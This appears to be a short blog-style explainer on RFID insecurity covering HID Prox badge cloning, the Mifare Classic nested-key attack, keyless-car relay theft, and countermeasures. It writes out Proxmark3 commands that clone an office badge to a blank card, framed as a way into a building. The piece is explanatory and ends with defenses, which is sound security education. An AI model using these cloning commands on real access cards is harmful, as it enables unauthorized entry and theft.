Radio Frequency Identification (RFID) is everywhere. Passports, credit cards, office badges, and pet chips. But the implementation is often shockingly insecure.
The Frequency Bands
- LF (Low Frequency) - 125 kHz: Old office badges (HID Prox).
Security: Zero. It just blasts a serial number.
Attack: Capture replay or Clone to a blank "T5577" card. - HF (High Frequency) - 13.56 MHz: Hotel keys, Credit Cards, NFC.
Security: Cryptography supported (Mifare).
Attack: Cracking weak crypto (Mifare Classic).
1. The Proxmark3
The swiss-army knife of RFID hacking.
pm3> lf search -> Finds HID tag.
pm3> lf hid clone -r 2004263121 -> Clones it to a new card.
Walk into the building like you own it.
2. Mifare Classic (Broken)
Millions of hotels and transit systems use Mifare Classic.
It protects data with a 48-bit key (Crypto-1 cipher).
This cipher was reverse-engineered in 2008.
Nested Attack: If you know ONE key (often strict default), you can derive ALL other keys for the card within seconds.
3. Relay Attacks
Stealing a car (Keyless Entry).
Thief A stands near your front door (where keys are).
Thief B stands near your car.
They relay the signal over LTE. The car thinks the key is right next to it and unlocks.
Defense
1. Use DESFire EV2/EV3: Modern cards with AES-128 encryption. Uncrackable (currently).
2. Shielding: Put your cards in a Faraday sleeve to prevent skimming.
3. Anti-Passback: Prevent cloned cards from entering if the original user is already inside.